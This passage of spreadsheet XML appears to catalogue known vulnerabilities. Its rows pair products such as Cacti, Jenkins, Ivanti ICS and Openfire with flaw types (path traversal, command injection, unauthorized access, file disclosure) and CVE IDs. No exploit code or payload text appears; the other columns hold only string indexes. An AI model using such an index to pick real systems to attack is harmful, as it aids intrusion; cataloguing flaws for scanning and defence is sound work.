        <v>2059</v>
      </c>
    </row>
    <row r="606" s="4" customFormat="1" spans="1:6">
      <c r="A606" s="2" t="s">
        <v>2060</v>
      </c>
      <c r="B606" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C606" s="2" t="s">
        <v>2061</v>
      </c>
      <c r="D606" s="2" t="str">
        <f t="shared" si="9"/>
        <v>ZKTeco BioTime_路径遍历_CVE-2023-38950</v>
      </c>
      <c r="E606" s="6" t="s">
        <v>2062</v>
      </c>
      <c r="F606" s="4" t="s">
        <v>2063</v>
      </c>
    </row>
    <row r="607" s="4" customFormat="1" spans="1:6">
      <c r="A607" s="2" t="s">
        <v>1471</v>
      </c>
      <c r="B607" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C607" s="2" t="s">
        <v>2064</v>
      </c>
      <c r="D607" s="2" t="str">
        <f t="shared" si="9"/>
        <v>openSIS_路径遍历_CVE-2023-38879</v>
      </c>
      <c r="E607" s="6" t="s">
        <v>2065</v>
      </c>
      <c r="F607" s="4" t="s">
        <v>2066</v>
      </c>
    </row>
    <row r="608" s="4" customFormat="1" spans="1:6">
      <c r="A608" s="2" t="s">
        <v>2067</v>
      </c>
      <c r="B608" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C608" s="2" t="s">
        <v>2068</v>
      </c>
      <c r="D608" s="2" t="str">
        <f t="shared" si="9"/>
        <v>CData API Server_路径遍历_CVE-2024-31848</v>
      </c>
      <c r="E608" s="6" t="s">
        <v>2069</v>
      </c>
      <c r="F608" s="4" t="s">
        <v>2070</v>
      </c>
    </row>
    <row r="609" s="4" customFormat="1" spans="1:6">
      <c r="A609" s="2" t="s">
        <v>2071</v>
      </c>
      <c r="B609" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C609" s="2" t="s">
        <v>2072</v>
      </c>
      <c r="D609" s="2" t="str">
        <f t="shared" si="9"/>
        <v>FastAdmin_路径遍历_CVE-2024-7928</v>
      </c>
      <c r="E609" s="6" t="s">
        <v>2073</v>
      </c>
      <c r="F609" s="4" t="s">
        <v>2074</v>
      </c>
    </row>
    <row r="610" s="4" customFormat="1" spans="1:6">
      <c r="A610" s="2" t="s">
        <v>2075</v>
      </c>
      <c r="B610" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C610" s="2" t="s">
        <v>2076</v>
      </c>
      <c r="D610" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Oracle Retail Xstore Suite_路径遍历_CVE-2024-21136</v>
      </c>
      <c r="E610" s="6" t="s">
        <v>2077</v>
      </c>
      <c r="F610" s="4" t="s">
        <v>2078</v>
      </c>
    </row>
    <row r="611" s="4" customFormat="1" spans="1:6">
      <c r="A611" s="2" t="s">
        <v>2079</v>
      </c>
      <c r="B611" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C611" s="2" t="s">
        <v>2080</v>
      </c>
      <c r="D611" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Sante PACS Server_路径遍历_CVE-2025-2264</v>
      </c>
      <c r="E611" s="6" t="s">
        <v>2081</v>
      </c>
      <c r="F611" s="4" t="s">
        <v>2082</v>
      </c>
    </row>
    <row r="612" s="4" customFormat="1" spans="1:6">
      <c r="A612" s="2" t="s">
        <v>2083</v>
      </c>
      <c r="B612" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C612" s="2" t="s">
        <v>2084</v>
      </c>
      <c r="D612" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Yeswiki_路径遍历_CVE-2025-31131</v>
      </c>
      <c r="E612" s="6" t="s">
        <v>2085</v>
      </c>
      <c r="F612" s="4" t="s">
        <v>2086</v>
      </c>
    </row>
    <row r="613" s="4" customFormat="1" spans="1:6">
      <c r="A613" s="2" t="s">
        <v>2087</v>
      </c>
      <c r="B613" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C613" s="2"/>
      <c r="D613" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Alibaba Anyproxy_路径遍历</v>
      </c>
      <c r="E613" s="6" t="s">
        <v>2088</v>
      </c>
      <c r="F613" s="4" t="s">
        <v>2089</v>
      </c>
    </row>
    <row r="614" s="4" customFormat="1" spans="1:6">
      <c r="A614" s="2" t="s">
        <v>2090</v>
      </c>
      <c r="B614" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="C614" s="2"/>
      <c r="D614" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Oracle Fatwire_路径遍历</v>
      </c>
      <c r="E614" s="6" t="s">
        <v>2091</v>
      </c>
      <c r="F614" s="4" t="s">
        <v>2092</v>
      </c>
    </row>
    <row r="615" s="4" customFormat="1" spans="1:6">
      <c r="A615" s="2" t="s">
        <v>2093</v>
      </c>
      <c r="B615" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C615" s="2" t="s">
        <v>2095</v>
      </c>
      <c r="D615" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Seagate BlackArmor NAS_命令注入_CVE-2014-3206</v>
      </c>
      <c r="E615" s="6" t="s">
        <v>2096</v>
      </c>
      <c r="F615" s="4" t="s">
        <v>2097</v>
      </c>
    </row>
    <row r="616" s="4" customFormat="1" spans="1:6">
      <c r="A616" s="2" t="s">
        <v>2098</v>
      </c>
      <c r="B616" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C616" s="2" t="s">
        <v>2099</v>
      </c>
      <c r="D616" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Trixbox_命令注入_CVE-2017-14535</v>
      </c>
      <c r="E616" s="6" t="s">
        <v>2100</v>
      </c>
      <c r="F616" s="4" t="s">
        <v>2101</v>
      </c>
    </row>
    <row r="617" s="4" customFormat="1" spans="1:6">
      <c r="A617" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="B617" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C617" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="D617" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Jenkins_命令注入_CVE-2018-1000861</v>
      </c>
      <c r="E617" s="6" t="s">
        <v>2104</v>
      </c>
      <c r="F617" s="4" t="s">
        <v>2105</v>
      </c>
    </row>
    <row r="618" s="4" customFormat="1" spans="1:6">
      <c r="A618" s="2" t="s">
        <v>2106</v>
      </c>
      <c r="B618" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C618" s="2" t="s">
        <v>2107</v>
      </c>
      <c r="D618" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Yachtcontrol Webapplication_命令注入_CVE-2019-17270</v>
      </c>
      <c r="E618" s="6" t="s">
        <v>2108</v>
      </c>
      <c r="F618" s="4" t="s">
        <v>2109</v>
      </c>
    </row>
    <row r="619" s="4" customFormat="1" spans="1:6">
      <c r="A619" s="2" t="s">
        <v>2110</v>
      </c>
      <c r="B619" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C619" s="2" t="s">
        <v>2111</v>
      </c>
      <c r="D619" s="2" t="str">
        <f t="shared" si="9"/>
        <v>WAVLINK WN live_api_命令注入_CVE-2020-12124</v>
      </c>
      <c r="E619" s="6" t="s">
        <v>2112</v>
      </c>
      <c r="F619" s="4" t="s">
        <v>2113</v>
      </c>
    </row>
    <row r="620" s="4" customFormat="1" spans="1:6">
      <c r="A620" s="2" t="s">
        <v>645</v>
      </c>
      <c r="B620" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C620" s="2" t="s">
        <v>2114</v>
      </c>
      <c r="D620" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Zeroshell_命令注入_CVE-2020-29390</v>
      </c>
      <c r="E620" s="6" t="s">
        <v>2115</v>
      </c>
      <c r="F620" s="4" t="s">
        <v>2116</v>
      </c>
    </row>
    <row r="621" s="4" customFormat="1" spans="1:6">
      <c r="A621" s="2" t="s">
        <v>2117</v>
      </c>
      <c r="B621" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C621" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="D621" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Geutebruck_命令注入_CVE-2021-33544</v>
      </c>
      <c r="E621" s="6" t="s">
        <v>2119</v>
      </c>
      <c r="F621" s="4" t="s">
        <v>2120</v>
      </c>
    </row>
    <row r="622" s="4" customFormat="1" spans="1:6">
      <c r="A622" s="2" t="s">
        <v>2121</v>
      </c>
      <c r="B622" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C622" s="2" t="s">
        <v>2122</v>
      </c>
      <c r="D622" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Node System Information Library_命令注入_CVE-2021-21315</v>
      </c>
      <c r="E622" s="6" t="s">
        <v>2123</v>
      </c>
      <c r="F622" s="4" t="s">
        <v>2124</v>
      </c>
    </row>
    <row r="623" s="4" customFormat="1" spans="1:6">
      <c r="A623" s="2" t="s">
        <v>2125</v>
      </c>
      <c r="B623" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C623" s="2" t="s">
        <v>2126</v>
      </c>
      <c r="D623" s="2" t="str">
        <f t="shared" si="9"/>
        <v>YeaLink DM_命令注入_CVE-2021-27561</v>
      </c>
      <c r="E623" s="6" t="s">
        <v>2127</v>
      </c>
      <c r="F623" s="4" t="s">
        <v>2128</v>
      </c>
    </row>
    <row r="624" s="4" customFormat="1" spans="1:6">
      <c r="A624" s="2" t="s">
        <v>2129</v>
      </c>
      <c r="B624" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C624" s="2" t="s">
        <v>2130</v>
      </c>
      <c r="D624" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Atlassian Bitbucket_命令注入_CVE-2022-36804</v>
      </c>
      <c r="E624" s="6" t="s">
        <v>2131</v>
      </c>
      <c r="F624" s="4" t="s">
        <v>2132</v>
      </c>
    </row>
    <row r="625" s="4" customFormat="1" spans="1:6">
      <c r="A625" s="2" t="s">
        <v>2133</v>
      </c>
      <c r="B625" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C625" s="2" t="s">
        <v>2134</v>
      </c>
      <c r="D625" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Cacti_命令注入_CVE-2022-46169</v>
      </c>
      <c r="E625" s="6" t="s">
        <v>2135</v>
      </c>
      <c r="F625" s="4" t="s">
        <v>2136</v>
      </c>
    </row>
    <row r="626" s="4" customFormat="1" spans="1:6">
      <c r="A626" s="2" t="s">
        <v>2137</v>
      </c>
      <c r="B626" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C626" s="2" t="s">
        <v>2138</v>
      </c>
      <c r="D626" s="2" t="str">
        <f t="shared" si="9"/>
        <v>MajorDoMo thumb_命令注入_CVE-2023-50917</v>
      </c>
      <c r="E626" s="6" t="s">
        <v>2139</v>
      </c>
      <c r="F626" s="4" t="s">
        <v>2140</v>
      </c>
    </row>
    <row r="627" s="4" customFormat="1" spans="1:6">
      <c r="A627" s="2" t="s">
        <v>2141</v>
      </c>
      <c r="B627" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C627" s="2" t="s">
        <v>2142</v>
      </c>
      <c r="D627" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Cacti cmd_realtime_命令注入_CVE-2024-29895</v>
      </c>
      <c r="E627" s="6" t="s">
        <v>2143</v>
      </c>
      <c r="F627" s="4" t="s">
        <v>2144</v>
      </c>
    </row>
    <row r="628" s="4" customFormat="1" spans="1:6">
      <c r="A628" s="2" t="s">
        <v>2145</v>
      </c>
      <c r="B628" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C628" s="2" t="s">
        <v>2146</v>
      </c>
      <c r="D628" s="2" t="str">
        <f t="shared" si="9"/>
        <v>DrayTek Vigor_命令注入_CVE-2024-12987</v>
      </c>
      <c r="E628" s="6" t="s">
        <v>2147</v>
      </c>
      <c r="F628" s="4" t="s">
        <v>2148</v>
      </c>
    </row>
    <row r="629" s="4" customFormat="1" spans="1:6">
      <c r="A629" s="2" t="s">
        <v>2149</v>
      </c>
      <c r="B629" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C629" s="2" t="s">
        <v>2150</v>
      </c>
      <c r="D629" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Progress Kemp Flowmon_命令注入_CVE-2024-2389</v>
      </c>
      <c r="E629" s="6" t="s">
        <v>2151</v>
      </c>
      <c r="F629" s="4" t="s">
        <v>2152</v>
      </c>
    </row>
    <row r="630" s="4" customFormat="1" spans="1:6">
      <c r="A630" s="2" t="s">
        <v>2153</v>
      </c>
      <c r="B630" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C630" s="2" t="s">
        <v>2154</v>
      </c>
      <c r="D630" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Raisecom_命令注入_CVE-2024-7120</v>
      </c>
      <c r="E630" s="6" t="s">
        <v>2155</v>
      </c>
      <c r="F630" s="4" t="s">
        <v>2156</v>
      </c>
    </row>
    <row r="631" s="4" customFormat="1" spans="1:6">
      <c r="A631" s="2" t="s">
        <v>2157</v>
      </c>
      <c r="B631" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="C631" s="2" t="s">
        <v>2158</v>
      </c>
      <c r="D631" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Palo Alto Networks Expedition_命令注入_CVE-2025-0107</v>
      </c>
      <c r="E631" s="6" t="s">
        <v>2159</v>
      </c>
      <c r="F631" s="4" t="s">
        <v>2160</v>
      </c>
    </row>
    <row r="632" s="4" customFormat="1" spans="1:6">
      <c r="A632" s="2" t="s">
        <v>2161</v>
      </c>
      <c r="B632" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C632" s="2" t="s">
        <v>2163</v>
      </c>
      <c r="D632" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Symfony_未授权访问_CVE-2015-4050</v>
      </c>
      <c r="E632" s="6" t="s">
        <v>2164</v>
      </c>
      <c r="F632" s="4" t="s">
        <v>2165</v>
      </c>
    </row>
    <row r="633" s="4" customFormat="1" spans="1:6">
      <c r="A633" s="2" t="s">
        <v>2166</v>
      </c>
      <c r="B633" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C633" s="2" t="s">
        <v>2167</v>
      </c>
      <c r="D633" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Trend Micro Threat Discovery Appliance_未授权访问_CVE-2016-7552</v>
      </c>
      <c r="E633" s="6" t="s">
        <v>2168</v>
      </c>
      <c r="F633" s="4" t="s">
        <v>2169</v>
      </c>
    </row>
    <row r="634" s="4" customFormat="1" spans="1:6">
      <c r="A634" s="2" t="s">
        <v>450</v>
      </c>
      <c r="B634" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C634" s="2" t="s">
        <v>2170</v>
      </c>
      <c r="D634" s="2" t="str">
        <f t="shared" si="9"/>
        <v>NETGEAR Routers_未授权访问_CVE-2017-5521</v>
      </c>
      <c r="E634" s="6" t="s">
        <v>2171</v>
      </c>
      <c r="F634" s="4" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="635" s="4" customFormat="1" spans="1:6">
      <c r="A635" s="2" t="s">
        <v>2173</v>
      </c>
      <c r="B635" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C635" s="2" t="s">
        <v>2174</v>
      </c>
      <c r="D635" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Intelbras NPLUG_未授权访问_CVE-2018-12455</v>
      </c>
      <c r="E635" s="6" t="s">
        <v>2175</v>
      </c>
      <c r="F635" s="4" t="s">
        <v>2176</v>
      </c>
    </row>
    <row r="636" s="4" customFormat="1" spans="1:6">
      <c r="A636" s="2" t="s">
        <v>2177</v>
      </c>
      <c r="B636" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C636" s="2" t="s">
        <v>2178</v>
      </c>
      <c r="D636" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Kubernetes Dashboard_未授权访问_CVE-2018-18264</v>
      </c>
      <c r="E636" s="6" t="s">
        <v>2179</v>
      </c>
      <c r="F636" s="4" t="s">
        <v>2180</v>
      </c>
    </row>
    <row r="637" s="4" customFormat="1" spans="1:6">
      <c r="A637" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B637" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C637" s="2" t="s">
        <v>2181</v>
      </c>
      <c r="D637" s="2" t="str">
        <f t="shared" si="9"/>
        <v>WordPress_未授权访问_CVE-2018-3810</v>
      </c>
      <c r="E637" s="6" t="s">
        <v>2182</v>
      </c>
      <c r="F637" s="4" t="s">
        <v>2183</v>
      </c>
    </row>
    <row r="638" s="4" customFormat="1" spans="1:6">
      <c r="A638" s="2" t="s">
        <v>2184</v>
      </c>
      <c r="B638" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C638" s="2" t="s">
        <v>2185</v>
      </c>
      <c r="D638" s="2" t="str">
        <f t="shared" si="9"/>
        <v>ThinVNC_未授权访问_CVE-2019-17662</v>
      </c>
      <c r="E638" s="6" t="s">
        <v>2186</v>
      </c>
      <c r="F638" s="4" t="s">
        <v>2187</v>
      </c>
    </row>
    <row r="639" s="4" customFormat="1" spans="1:6">
      <c r="A639" s="2" t="s">
        <v>2188</v>
      </c>
      <c r="B639" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C639" s="2" t="s">
        <v>2189</v>
      </c>
      <c r="D639" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Oracle iPlanet Web Server_未授权访问_CVE-2020-9315</v>
      </c>
      <c r="E639" s="6" t="s">
        <v>2190</v>
      </c>
      <c r="F639" s="4" t="s">
        <v>2191</v>
      </c>
    </row>
    <row r="640" s="4" customFormat="1" spans="1:6">
      <c r="A640" s="2" t="s">
        <v>2192</v>
      </c>
      <c r="B640" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C640" s="2" t="s">
        <v>2193</v>
      </c>
      <c r="D640" s="2" t="str">
        <f t="shared" si="9"/>
        <v>MSNSwitch Firmware MNT_未授权访问_CVE-2022-32429</v>
      </c>
      <c r="E640" s="6" t="s">
        <v>2194</v>
      </c>
      <c r="F640" s="4" t="s">
        <v>2195</v>
      </c>
    </row>
    <row r="641" s="4" customFormat="1" spans="1:6">
      <c r="A641" s="2" t="s">
        <v>2196</v>
      </c>
      <c r="B641" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C641" s="2" t="s">
        <v>2197</v>
      </c>
      <c r="D641" s="2" t="str">
        <f t="shared" si="9"/>
        <v>Powertek Firmware_未授权访问_CVE-2022-33174</v>
      </c>
      <c r="E641" s="6" t="s">
        <v>2198</v>
      </c>
      <c r="F641" s="4" t="s">
        <v>2199</v>
      </c>
    </row>
    <row r="642" s="4" customFormat="1" spans="1:6">
      <c r="A642" s="2" t="s">
        <v>2200</v>
      </c>
      <c r="B642" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C642" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="D642" s="2" t="str">
        <f t="shared" ref="D642:D705" si="10">_xlfn.TEXTJOIN("_",TRUE,A642:C642)</f>
        <v>Tenda AC V_未授权访问_CVE-2022-40843</v>
      </c>
      <c r="E642" s="6" t="s">
        <v>2202</v>
      </c>
      <c r="F642" s="4" t="s">
        <v>2203</v>
      </c>
    </row>
    <row r="643" s="4" customFormat="1" spans="1:6">
      <c r="A643" s="2" t="s">
        <v>2204</v>
      </c>
      <c r="B643" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C643" s="2" t="s">
        <v>2205</v>
      </c>
      <c r="D643" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Zyxel_未授权访问_CVE-2022-0342</v>
      </c>
      <c r="E643" s="6" t="s">
        <v>2206</v>
      </c>
      <c r="F643" s="4" t="s">
        <v>2207</v>
      </c>
    </row>
    <row r="644" s="4" customFormat="1" spans="1:6">
      <c r="A644" s="2" t="s">
        <v>2208</v>
      </c>
      <c r="B644" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C644" s="2" t="s">
        <v>2209</v>
      </c>
      <c r="D644" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Adobe Coldfusion_未授权访问_CVE-2023-26347</v>
      </c>
      <c r="E644" s="6" t="s">
        <v>2210</v>
      </c>
      <c r="F644" s="4" t="s">
        <v>2211</v>
      </c>
    </row>
    <row r="645" s="4" customFormat="1" spans="1:6">
      <c r="A645" s="2" t="s">
        <v>2212</v>
      </c>
      <c r="B645" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C645" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="D645" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Ivanti ICS_未授权访问_CVE-2023-46805</v>
      </c>
      <c r="E645" s="6" t="s">
        <v>2214</v>
      </c>
      <c r="F645" s="4" t="s">
        <v>2215</v>
      </c>
    </row>
    <row r="646" s="4" customFormat="1" spans="1:6">
      <c r="A646" s="2" t="s">
        <v>2216</v>
      </c>
      <c r="B646" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C646" s="2" t="s">
        <v>2217</v>
      </c>
      <c r="D646" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Openfire Administration Console_未授权访问_CVE-2023-32315</v>
      </c>
      <c r="E646" s="6" t="s">
        <v>2218</v>
      </c>
      <c r="F646" s="4" t="s">
        <v>2219</v>
      </c>
    </row>
    <row r="647" s="4" customFormat="1" spans="1:6">
      <c r="A647" s="2" t="s">
        <v>2220</v>
      </c>
      <c r="B647" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C647" s="2" t="s">
        <v>2221</v>
      </c>
      <c r="D647" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Strapi Versions_未授权访问_CVE-2023-22893</v>
      </c>
      <c r="E647" s="6" t="s">
        <v>2222</v>
      </c>
      <c r="F647" s="4" t="s">
        <v>2223</v>
      </c>
    </row>
    <row r="648" s="4" customFormat="1" spans="1:6">
      <c r="A648" s="2" t="s">
        <v>2224</v>
      </c>
      <c r="B648" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C648" s="2" t="s">
        <v>2225</v>
      </c>
      <c r="D648" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Crypto_未授权访问_CVE-2024-9989</v>
      </c>
      <c r="E648" s="6" t="s">
        <v>2226</v>
      </c>
      <c r="F648" s="4" t="s">
        <v>2227</v>
      </c>
    </row>
    <row r="649" s="4" customFormat="1" spans="1:6">
      <c r="A649" s="2" t="s">
        <v>2228</v>
      </c>
      <c r="B649" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C649" s="2" t="s">
        <v>2229</v>
      </c>
      <c r="D649" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Fortra GoAnywhere MFT_未授权访问_CVE-2024-0204</v>
      </c>
      <c r="E649" s="6" t="s">
        <v>2230</v>
      </c>
      <c r="F649" s="4" t="s">
        <v>2231</v>
      </c>
    </row>
    <row r="650" s="4" customFormat="1" spans="1:6">
      <c r="A650" s="2" t="s">
        <v>2232</v>
      </c>
      <c r="B650" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C650" s="2" t="s">
        <v>2233</v>
      </c>
      <c r="D650" s="2" t="str">
        <f t="shared" si="10"/>
        <v>OpenMetadata_未授权访问_CVE-2024-28255</v>
      </c>
      <c r="E650" s="6" t="s">
        <v>2234</v>
      </c>
      <c r="F650" s="4" t="s">
        <v>2235</v>
      </c>
    </row>
    <row r="651" s="4" customFormat="1" spans="1:6">
      <c r="A651" s="2" t="s">
        <v>2236</v>
      </c>
      <c r="B651" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C651" s="2" t="s">
        <v>2237</v>
      </c>
      <c r="D651" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Navidrome_未授权访问_CVE-2025-27112</v>
      </c>
      <c r="E651" s="6" t="s">
        <v>2238</v>
      </c>
      <c r="F651" s="4" t="s">
        <v>2239</v>
      </c>
    </row>
    <row r="652" s="4" customFormat="1" spans="1:6">
      <c r="A652" s="2" t="s">
        <v>165</v>
      </c>
      <c r="B652" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C652" s="2" t="s">
        <v>2240</v>
      </c>
      <c r="D652" s="2" t="str">
        <f t="shared" si="10"/>
        <v>NetMRI_未授权访问_CVE-2025-32815</v>
      </c>
      <c r="E652" s="6" t="s">
        <v>2241</v>
      </c>
      <c r="F652" s="4" t="s">
        <v>2242</v>
      </c>
    </row>
    <row r="653" s="4" customFormat="1" spans="1:6">
      <c r="A653" s="2" t="s">
        <v>1557</v>
      </c>
      <c r="B653" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="C653" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D653" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Nsfocus_未授权访问</v>
      </c>
      <c r="E653" s="6" t="s">
        <v>2243</v>
      </c>
      <c r="F653" s="4" t="s">
        <v>2244</v>
      </c>
    </row>
    <row r="654" s="4" customFormat="1" spans="1:6">
      <c r="A654" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B654" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C654" s="2" t="s">
        <v>2246</v>
      </c>
      <c r="D654" s="2" t="str">
        <f t="shared" si="10"/>
        <v>WordPress_文件泄露_CVE-2015-1579</v>
      </c>
      <c r="E654" s="6" t="s">
        <v>2247</v>
      </c>
      <c r="F654" s="4" t="s">
        <v>2248</v>
      </c>
    </row>
    <row r="655" s="4" customFormat="1" spans="1:6">
      <c r="A655" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B655" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C655" s="2" t="s">
        <v>2249</v>
      </c>
      <c r="D655" s="2" t="str">
        <f t="shared" si="10"/>
        <v>大华_文件泄露_CVE-2017-7925</v>
      </c>
      <c r="E655" s="6" t="s">
        <v>2250</v>
      </c>
      <c r="F655" s="4" t="s">
        <v>2251</v>
      </c>
    </row>
    <row r="656" s="4" customFormat="1" spans="1:6">
      <c r="A656" s="2" t="s">
        <v>2252</v>
      </c>
      <c r="B656" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C656" s="2" t="s">
        <v>2253</v>
      </c>
      <c r="D656" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Icinga Web_文件泄露_CVE-2022-24716</v>
      </c>
      <c r="E656" s="6" t="s">
        <v>2254</v>
      </c>
      <c r="F656" s="4" t="s">
        <v>2255</v>
      </c>
    </row>
    <row r="657" s="4" customFormat="1" spans="1:6">
      <c r="A657" s="2" t="s">
        <v>2256</v>
      </c>
      <c r="B657" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C657" s="2" t="s">
        <v>2257</v>
      </c>
      <c r="D657" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Adobe Connect_文件泄露_CVE-2023-22232</v>
      </c>
      <c r="E657" s="6" t="s">
        <v>2258</v>
      </c>
      <c r="F657" s="4" t="s">
        <v>2259</v>
      </c>
    </row>
    <row r="658" s="4" customFormat="1" spans="1:6">
      <c r="A658" s="2" t="s">
        <v>2260</v>
      </c>
      <c r="B658" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C658" s="2"/>
      <c r="D658" s="2" t="str">
        <f t="shared" si="10"/>
        <v>FastCGI Configuration_文件泄露</v>
      </c>
      <c r="E658" s="6" t="s">
        <v>2261</v>
      </c>
      <c r="F658" s="4" t="s">
        <v>2262</v>
      </c>
    </row>
    <row r="659" s="4" customFormat="1" spans="1:6">
      <c r="A659" s="2" t="s">
        <v>2263</v>
      </c>
      <c r="B659" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C659" s="2"/>
      <c r="D659" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Mercurial Ignore_文件泄露</v>
      </c>
      <c r="E659" s="6" t="s">
        <v>2264</v>
      </c>
      <c r="F659" s="4" t="s">
        <v>2265</v>
      </c>
    </row>
    <row r="660" s="4" customFormat="1" spans="1:6">
      <c r="A660" s="2" t="s">
        <v>2266</v>
      </c>
      <c r="B660" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C660" s="2"/>
      <c r="D660" s="2" t="str">
        <f t="shared" si="10"/>
        <v>cPanel Configuration_文件泄露</v>
      </c>
      <c r="E660" s="6" t="s">
        <v>2267</v>
      </c>
      <c r="F660" s="4" t="s">
        <v>2268</v>
      </c>
    </row>
    <row r="661" s="4" customFormat="1" spans="1:6">
      <c r="A661" s="2" t="s">
        <v>2269</v>
      </c>
      <c r="B661" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C661" s="2"/>
      <c r="D661" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Apdisk_文件泄露</v>
      </c>
      <c r="E661" s="6" t="s">
        <v>2270</v>
      </c>
      <c r="F661" s="4" t="s">
        <v>2271</v>
      </c>
    </row>
    <row r="662" s="4" customFormat="1" spans="1:6">
      <c r="A662" s="2" t="s">
        <v>2272</v>
      </c>
      <c r="B662" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C662" s="2"/>
      <c r="D662" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Azure Pipelines_文件泄露</v>
      </c>
      <c r="E662" s="6" t="s">
        <v>2273</v>
      </c>
      <c r="F662" s="4" t="s">
        <v>2274</v>
      </c>
    </row>
    <row r="663" s="4" customFormat="1" spans="1:6">
      <c r="A663" s="2" t="s">
        <v>2275</v>
      </c>
      <c r="B663" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C663" s="2"/>
      <c r="D663" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Cargo TOML_文件泄露</v>
      </c>
      <c r="E663" s="6" t="s">
        <v>2276</v>
      </c>
      <c r="F663" s="4" t="s">
        <v>2277</v>
      </c>
    </row>
    <row r="664" s="4" customFormat="1" spans="1:6">
      <c r="A664" s="2" t="s">
        <v>2278</v>
      </c>
      <c r="B664" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C664" s="2"/>
